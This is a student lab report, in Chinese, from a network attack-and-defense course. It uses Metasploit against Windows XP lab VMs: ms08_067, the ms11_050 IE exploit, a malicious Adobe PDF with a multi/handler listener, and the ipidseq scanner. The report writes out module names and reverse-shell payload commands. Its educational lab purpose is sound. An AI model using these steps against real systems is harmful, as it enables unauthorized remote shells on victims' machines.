2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

《网络对抗技术》Exp5 MSF基础应用

• 实验目的

• 实验内容

1. 一个主动攻击实践（ms08_067）
2. 一个针对浏览器的攻击（ms11_050）
3. 一个针对客户端的攻击（adobe_toolbutton）
4. 成功应用任何一个辅助模块（ipidseq）（唯一）

• 基础问题

• 实验中遇到的问题

• 实验总结与体会

---

实验目的

掌握metasploit的基本应用方式，重点常用的三种攻击方式的思路

返回目录

---

实验环境：

• 靶机1：Windows XP Professional SP2
• 靶机2：Windows XP vivian SP3 简体中文

---

基础问题：

用自己的话解释什么是 exploit ， payload ， encode 。

1. exploit：利用漏洞，达到攻击控制受害机的一种手段。
2. payload：载荷，含有执行攻击的代码，攻击者进行攻击的“武器”。
3. encode：对攻击代码进行伪装，使得shellcode改变形状。使其能正常运行并尽量免杀。

返回目录

---

1、主动攻击：ms08_067

• 使用靶机1和Kali
• msfconsole进入msf，再用search ms08_067查询一下针对该漏洞的攻击模块

• 用show targets查看可以被攻击的靶机的操作系统型号：

• 用show payloads查看可以供我们使用的攻击载荷：

• 从中找到一个可用的攻击载荷generic/shell_reverse_tcp，用set payload generic/shell_reverse_tcp设置payload：

• 用show options查看需要设置的参数

• 设置RHOST（靶机IP）和LHOST（Kali的IP）：

• 设置target选项目标（我攻击的系统为WIN xp 中文简体 SP2，所以选择9）

• 确认参数设置无误后，用exploit指令开始攻击：

• 攻击成功后会获取靶机的shell，可以对其进行操作：

返回目录

---

2、针对浏览器的攻击：ms11_050

• 使用靶机2和Kali：用search ms11_050查询一下针对该漏洞的攻击模块，并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块：

• 用info查看该模块的信息（这个指令相当于show targets、show options等的集合版）：

• 用set payload windows/meterpreter/reverse_tcp设置payload，并设置需要设置的参数。

用show options确认需要设置的参数是否已经设置好。

• 确认参数设置无误后，用exploit指令开始攻击，攻击成功后会有靶机需要访问的网址：

• 在靶机IE上输入该网址

• kali中显示session 1已经创建，并显示其会话ID

然而实验2还是失败了 XP系统的IE浏览器已经崩掉了

返回目录

---

3、针对客户端的攻击：adobe_toolbutton

• 使用靶机2和Kali：用search adobe查询一下针对该漏洞的攻击模块：

• 选择一个模块并使用该模块：

• 用show targets查看可以被攻击的靶机的操作系统型号

• 设置payload攻击载荷，命令set payload windows/meterpreter/reverse_tcp

• 用show options查看需要设置的参数：

• 设置相应参数，实施exploit攻击，发现在/root/.msf4/local/目录下成功生成了一个gapziyun.pdf文件：

• 如果在kali中找不到这个pdf文件，那么打开文件夹的隐藏文件显示就可以找到

• 将pdf文件粘贴到靶机win xp

• 在kali中打开并设置监听模块use exploit/multi/handler，set payload windows/meterpreter/reverse_tcp，再设置IP以及端口

• 在靶机上打开刚刚那个pdf文件可以观察到Kali成功获取了靶机的shell，可以对其进行操作：

返回目录

---

4、成功应用任何一个辅助模块：ipidseq

• ipidseq
  功能：扫描网段中的存活ip，它会识别被发现主机的IPID（用于跟踪IP包的次序的一种技术）序列模式，并且表示出哪些是0、随机或递增的。
• 用show auxiliary查看所有辅助模块，并选择其中的一个，选的是scanner/ip/ipidseq：

• 查看需要设置的参数，设置完成后确认一下，这里可以进行对单一目标主机的扫描，然后就可以开始exploit了。

• 也可以对指定网段的主机进行扫描：

返回目录

---

实验中遇到的问题

 第二个任务的时候网页一直崩溃，尝试了如下的方法解决：

1.将其加入信任站点（失败）

2.对Internet进行重新设置。将杀毒防御功能关闭（无效）

总结一下：可能是攻击程序太经典了。IE已经能检测到此漏洞

返回目录

---

实验总结与体会

1.通过这次实验基本掌握了msf渗透攻击的“套路”，search 查看漏洞信息，show targets 查看可以攻击的系统，show payloads 选择合适的载荷 ，show options 查看需要修改那些属性，info查看各种详细信息，最后反弹链接shell，只要找到合适的靶机，合适的版本，按流程下来基本都可以解决。

2.实验过程中，失败很多次，其实心态差点爆炸，但是仔细一想网络攻防失败是正常的。静下心来完成了之前剩下的实验。整个实验做完了，感受的是网络攻防过程，而不是那个结果。

返回目录